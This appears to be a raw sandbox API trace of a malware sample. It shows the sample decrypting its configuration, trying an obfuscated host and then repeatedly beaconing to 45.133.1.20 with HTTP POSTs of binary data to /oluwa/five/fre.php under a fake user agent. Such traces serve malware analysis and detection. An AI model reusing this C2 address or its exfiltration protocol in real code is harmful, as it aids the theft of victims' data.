StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0280.581] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.581] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0280.582] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.582] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0280.582] GetProcessHeap () returned 0x6a0000 [0280.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0280.583] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0280.583] GetProcessHeap () returned 0x6a0000 [0280.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0280.584] GetProcessHeap () returned 0x6a0000 [0280.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0280.584] GetProcessHeap () returned 0x6a0000 [0280.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0280.585] GetProcessHeap () returned 0x6a0000 [0280.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0280.586] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.586] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0280.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.595] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0280.605] GetProcessHeap () returned 0x6a0000 [0280.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0280.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.607] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0280.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.646] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0280.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.647] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0280.647] GetProcessHeap () returned 0x6a0000 [0280.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0280.649] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.650] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0280.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.651] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0280.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.653] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0280.653] GetProcessHeap () returned 0x6a0000 [0280.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0280.653] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.654] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0280.657] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.657] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0280.657] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.658] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0280.659] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.659] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0280.659] GetProcessHeap () returned 0x6a0000 [0280.659] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0280.659] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0280.659] GetProcessHeap () returned 0x6a0000 [0280.659] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0280.659] socket (af=2, type=1, protocol=6) returned 0xa30 [0280.659] connect (s=0xa30, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0280.687] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0280.687] GetProcessHeap () returned 0x6a0000 [0280.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0280.687] GetProcessHeap () returned 0x6a0000 [0280.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0280.688] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0280.689] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0280.689] GetProcessHeap () returned 0x6a0000 [0280.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba0b0 [0280.689] GetProcessHeap () returned 0x6a0000 [0280.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0280.689] GetProcessHeap () returned 0x6a0000 [0280.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0280.689] GetProcessHeap () returned 0x6a0000 [0280.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0280.690] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0280.691] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0280.691] GetProcessHeap () returned 0x6a0000 [0280.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0280.691] GetProcessHeap () returned 0x6a0000 [0280.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0280.692] send (s=0xa30, buf=0x6bd460*, len=242, flags=0) returned 242 [0280.692] send (s=0xa30, buf=0x6bb998*, len=159, flags=0) returned 159 [0280.692] GetProcessHeap () returned 0x6a0000 [0280.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0280.692] recv (in: s=0xa30, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0280.769] GetProcessHeap () returned 0x6a0000 [0280.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0280.770] GetProcessHeap () returned 0x6a0000 [0280.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0280.771] GetProcessHeap () returned 0x6a0000 [0280.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba0b0 | out: hHeap=0x6a0000) returned 1 [0280.771] GetProcessHeap () returned 0x6a0000 [0280.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0280.772] closesocket (s=0xa30) returned 0 [0280.772] GetProcessHeap () returned 0x6a0000 [0280.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0280.772] GetProcessHeap () returned 0x6a0000 [0280.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0280.773] GetProcessHeap () returned 0x6a0000 [0280.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0280.773] GetProcessHeap () returned 0x6a0000 [0280.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0280.774] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17cc) returned 0xa30 [0280.776] Sleep (dwMilliseconds=0xea60) [0280.778] GetProcessHeap () returned 0x6a0000 [0280.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0280.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.779] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0280.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.789] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0280.796] GetProcessHeap () returned 0x6a0000 [0280.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0280.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.801] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0280.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.802] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0280.812] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.812] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0280.812] GetProcessHeap () returned 0x6a0000 [0280.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0280.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.814] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0280.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.815] CryptDestroyKey (hKey=0x6ad020) returned 1 [0280.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.816] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0280.816] GetProcessHeap () returned 0x6a0000 [0280.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0280.817] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.818] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0280.818] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.819] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0280.822] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.823] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0280.824] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.824] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0280.824] GetProcessHeap () returned 0x6a0000 [0280.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0280.824] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0280.824] GetProcessHeap () returned 0x6a0000 [0280.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0280.825] GetProcessHeap () returned 0x6a0000 [0280.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0280.825] GetProcessHeap () returned 0x6a0000 [0280.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0280.825] GetProcessHeap () returned 0x6a0000 [0280.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0280.826] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.826] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0280.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.834] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0280.843] GetProcessHeap () returned 0x6a0000 [0280.843] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0280.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.844] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0280.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.845] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0280.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.846] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0280.846] GetProcessHeap () returned 0x6a0000 [0280.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0280.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.848] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0280.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.849] CryptDestroyKey (hKey=0x6ad020) returned 1 [0280.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.850] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0280.850] GetProcessHeap () returned 0x6a0000 [0280.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0280.851] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.851] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0280.852] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.852] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0280.853] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.853] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0280.854] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.854] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0280.854] GetProcessHeap () returned 0x6a0000 [0280.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0280.854] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0280.854] GetProcessHeap () returned 0x6a0000 [0280.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0280.854] socket (af=2, type=1, protocol=6) returned 0xa34 [0280.855] connect (s=0xa34, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0280.884] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0280.884] GetProcessHeap () returned 0x6a0000 [0280.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0280.884] GetProcessHeap () returned 0x6a0000 [0280.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0280.885] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0280.885] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0280.885] GetProcessHeap () returned 0x6a0000 [0280.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba830 [0280.886] GetProcessHeap () returned 0x6a0000 [0280.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0280.887] GetProcessHeap () returned 0x6a0000 [0280.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0280.887] GetProcessHeap () returned 0x6a0000 [0280.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0280.888] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0280.889] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0280.889] GetProcessHeap () returned 0x6a0000 [0280.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0280.889] GetProcessHeap () returned 0x6a0000 [0280.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0280.889] send (s=0xa34, buf=0x6bd460*, len=242, flags=0) returned 242 [0280.890] send (s=0xa34, buf=0x6bb998*, len=159, flags=0) returned 159 [0280.890] GetProcessHeap () returned 0x6a0000 [0280.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0280.890] recv (in: s=0xa34, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0280.977] GetProcessHeap () returned 0x6a0000 [0280.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0280.978] GetProcessHeap () returned 0x6a0000 [0280.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0280.979] GetProcessHeap () returned 0x6a0000 [0280.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba830 | out: hHeap=0x6a0000) returned 1 [0280.979] GetProcessHeap () returned 0x6a0000 [0280.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0280.980] closesocket (s=0xa34) returned 0 [0280.981] GetProcessHeap () returned 0x6a0000 [0280.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0280.981] GetProcessHeap () returned 0x6a0000 [0280.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0280.981] GetProcessHeap () returned 0x6a0000 [0280.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0280.981] GetProcessHeap () returned 0x6a0000 [0280.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0280.982] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17d0) returned 0xa34 [0280.984] Sleep (dwMilliseconds=0xea60) [0280.988] GetProcessHeap () returned 0x6a0000 [0280.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0280.989] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.990] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0280.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.998] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0281.008] GetProcessHeap () returned 0x6a0000 [0281.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0281.009] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.009] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0281.010] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.010] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0281.011] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.011] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0281.011] GetProcessHeap () returned 0x6a0000 [0281.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0281.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.013] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0281.014] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.015] CryptDestroyKey (hKey=0x6ad560) returned 1 [0281.044] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.045] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0281.045] GetProcessHeap () returned 0x6a0000 [0281.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0281.046] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0281.046] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0281.047] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0281.047] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0281.048] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0281.049] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0281.050] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0281.050] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0281.050] GetProcessHeap () returned 0x6a0000 [0281.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0281.050] 